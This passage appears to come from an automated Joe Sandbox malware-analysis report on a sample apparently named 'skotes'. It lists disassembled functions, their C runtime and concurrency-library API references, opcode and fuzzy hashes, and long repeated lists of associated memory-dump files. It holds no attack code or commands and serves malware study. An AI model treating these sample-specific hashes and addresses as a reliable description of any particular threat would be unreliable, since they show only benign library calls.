                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981910800.0000000000E81000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_b70000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Concurrency::details::Context$Base::$GroupScheduleSegment$AssignAvailableConcurrency::location::_EventInternalMakeProcessor::ReleaseRunnableTraceVirtual
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 512098550-0
                                                                                                                                                                                                                                          • Opcode ID: da1082ad039060290408db7c737df252d54cc7f13fa7592d646c882ae61287c4
                                                                                                                                                                                                                                          • Instruction ID: 382410158a12ccc6d6691e5de92853d341aa252a98000894fb82804ec3501ece
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: da1082ad039060290408db7c737df252d54cc7f13fa7592d646c882ae61287c4
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 55412D75A00619EFCF09EF64C554A6DBBF6FF48310F0481A9E956AB391CB74AE01CB81
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 00B8ECED
                                                                                                                                                                                                                                          • Concurrency::details::_NonReentrantPPLLock::_Scoped_lock::_Scoped_lock.LIBCONCRT ref: 00B8ED17
                                                                                                                                                                                                                                            • Part of subcall function 00B8F3DD: Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 00B8F3FA
                                                                                                                                                                                                                                          • __alloca_probe_16.LIBCMT ref: 00B8ED53
                                                                                                                                                                                                                                          • Concurrency::details::EventWaitNode::Satisfy.LIBCONCRT ref: 00B8ED94
                                                                                                                                                                                                                                          • Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 00B8EDC6
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.2973332284.0000000000B71000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B70000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973183378.0000000000B70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973332284.0000000000BD2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973940335.0000000000BD9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974116469.0000000000BDB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974330158.0000000000BE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974509112.0000000000BE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974706941.0000000000BE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975510008.0000000000D3A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975673102.0000000000D3D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975858151.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976010191.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976133799.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976133799.0000000000D5E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976372810.0000000000D6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976588375.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976731520.0000000000D7B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976855106.0000000000D7C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977036956.0000000000D91000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977145651.0000000000D92000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977257068.0000000000D9A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977385733.0000000000DA7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977565674.0000000000DA8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978449942.0000000000DA9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978640930.0000000000DBB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978752510.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978864602.0000000000DCA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978946296.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979012965.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979113130.0000000000DD6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979526112.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979623514.0000000000DEC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979728075.0000000000DF4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979818464.0000000000DF5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979915094.0000000000DFD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980008821.0000000000E00000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980111926.0000000000E10000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980212112.0000000000E13000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980212112.0000000000E3E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980665830.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980796943.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980939158.0000000000E6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981125789.0000000000E6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981254982.0000000000E6C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981448988.0000000000E71000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981597675.0000000000E73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981781764.0000000000E80000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981910800.0000000000E81000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_b70000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Concurrency::details::_Lock::_Scoped_lock$Acquire_lockConcurrency::critical_section::_Concurrency::details::EventH_prolog3_Node::ReaderReentrantSatisfyScoped_lock::_Scoped_lock::~_WaitWriter__alloca_probe_16
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2568206803-0
                                                                                                                                                                                                                                          • Opcode ID: e709dcca1782d47da503e5f93633bda7ab58149edffe390dfca5d69972ea7523
                                                                                                                                                                                                                                          • Instruction ID: 2283a006b3af9f9c512ac6267e96e2ca3cb8000cf82089c191532427d07cd649
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e709dcca1782d47da503e5f93633bda7ab58149edffe390dfca5d69972ea7523
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AD317E71A001168BCB15EFA8C8415ADB7F4EF49310B6440BAE865F73A1DB74DE06CBA1
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • Concurrency::details::ReferenceCountedQuickBitSet::InterlockedSet.LIBCONCRT ref: 00B9D344
                                                                                                                                                                                                                                          • ListArray.LIBCONCRT ref: 00B9D367
                                                                                                                                                                                                                                          • Concurrency::details::SchedulerBase::VirtualProcessorActive.LIBCONCRT ref: 00B9D370
                                                                                                                                                                                                                                          • ListArray.LIBCONCRT ref: 00B9D3A8
                                                                                                                                                                                                                                          • Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 00B9D3B3
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.2973332284.0000000000B71000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B70000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973183378.0000000000B70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973332284.0000000000BD2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973940335.0000000000BD9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974116469.0000000000BDB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974330158.0000000000BE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974509112.0000000000BE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974706941.0000000000BE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975510008.0000000000D3A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975673102.0000000000D3D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975858151.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976010191.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976133799.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976133799.0000000000D5E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976372810.0000000000D6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976588375.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976731520.0000000000D7B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976855106.0000000000D7C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977036956.0000000000D91000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977145651.0000000000D92000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977257068.0000000000D9A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977385733.0000000000DA7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977565674.0000000000DA8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978449942.0000000000DA9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978640930.0000000000DBB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978752510.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978864602.0000000000DCA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978946296.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979012965.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979113130.0000000000DD6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979526112.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979623514.0000000000DEC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979728075.0000000000DF4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979818464.0000000000DF5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979915094.0000000000DFD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980008821.0000000000E00000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980111926.0000000000E10000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980212112.0000000000E13000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980212112.0000000000E3E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980665830.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980796943.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980939158.0000000000E6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981125789.0000000000E6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981254982.0000000000E6C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981448988.0000000000E71000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981597675.0000000000E73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981781764.0000000000E80000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981910800.0000000000E81000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_b70000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Concurrency::details::$ArrayListVirtual$ActiveAvailableBase::CountedInterlockedMakeProcessorProcessor::QuickReferenceSchedulerSet::
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 4212520697-0
                                                                                                                                                                                                                                          • Opcode ID: 0eafe2588eb36363e597e13b74526c3f154d00e2da32f5905d9d740176458b48
                                                                                                                                                                                                                                          • Instruction ID: de426743a4a66047b1690383381887ab02a7212d34661a67fb1774834b1ca483
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0eafe2588eb36363e597e13b74526c3f154d00e2da32f5905d9d740176458b48
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A631AE75704210EFCF05EB65C885BADB7E6EF89300F1541A9E80A9F392CB74AD41CB92
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • _SpinWait.LIBCONCRT ref: 00B986EE
                                                                                                                                                                                                                                            • Part of subcall function 00B8EAD0: _SpinWait.LIBCONCRT ref: 00B8EAE8
                                                                                                                                                                                                                                          • Concurrency::details::ContextBase::ClearAliasTable.LIBCONCRT ref: 00B98702
                                                                                                                                                                                                                                          • Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 00B98734
                                                                                                                                                                                                                                          • List.LIBCMT ref: 00B987B7
                                                                                                                                                                                                                                          • List.LIBCMT ref: 00B987C6
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.2973332284.0000000000B71000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B70000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973183378.0000000000B70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973332284.0000000000BD2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973940335.0000000000BD9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974116469.0000000000BDB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974330158.0000000000BE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974509112.0000000000BE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974706941.0000000000BE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975510008.0000000000D3A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975673102.0000000000D3D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975858151.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976010191.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976133799.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976133799.0000000000D5E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976372810.0000000000D6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976588375.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976731520.0000000000D7B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976855106.0000000000D7C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977036956.0000000000D91000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977145651.0000000000D92000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977257068.0000000000D9A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977385733.0000000000DA7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977565674.0000000000DA8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978449942.0000000000DA9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978640930.0000000000DBB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978752510.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978864602.0000000000DCA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978946296.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979012965.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979113130.0000000000DD6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979526112.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979623514.0000000000DEC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979728075.0000000000DF4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979818464.0000000000DF5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979915094.0000000000DFD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980008821.0000000000E00000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980111926.0000000000E10000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980212112.0000000000E13000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980212112.0000000000E3E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980665830.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980796943.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980939158.0000000000E6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981125789.0000000000E6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981254982.0000000000E6C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981448988.0000000000E71000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981597675.0000000000E73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981781764.0000000000E80000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981910800.0000000000E81000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_b70000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ListSpinWait$AcquireAliasBase::ClearConcurrency::details::Concurrency::details::_ContextLock::_ReaderTableWriteWriter
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3281396844-0
                                                                                                                                                                                                                                          • Opcode ID: 014186bf68b73918e03dcc2cf1837e7f72b7d01d507e0cbd2c71e4f68232d36e
                                                                                                                                                                                                                                          • Instruction ID: 61d2fc54e236d31a789ea587565a80d6f60f5ad09c65c9acc326bfe4f3fad2ab
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 014186bf68b73918e03dcc2cf1837e7f72b7d01d507e0cbd2c71e4f68232d36e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 50315532905256DFCF14EFA4C5816EDBBF1BF06318F2400BAD4016B662CB35AD04CB94
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00BA18A4
                                                                                                                                                                                                                                          • Concurrency::details::FreeVirtualProcessorRoot::SpinUntilIdle.LIBCONCRT ref: 00BA18EB
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.2973332284.0000000000B71000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B70000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973183378.0000000000B70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973332284.0000000000BD2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973940335.0000000000BD9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974116469.0000000000BDB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974330158.0000000000BE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974509112.0000000000BE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974706941.0000000000BE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975510008.0000000000D3A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975673102.0000000000D3D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975858151.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976010191.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976133799.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976133799.0000000000D5E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976372810.0000000000D6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976588375.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976731520.0000000000D7B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976855106.0000000000D7C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977036956.0000000000D91000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977145651.0000000000D92000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977257068.0000000000D9A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977385733.0000000000DA7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977565674.0000000000DA8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978449942.0000000000DA9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978640930.0000000000DBB000.00000080.00000001.01000000.00000007.sdmpDownload File
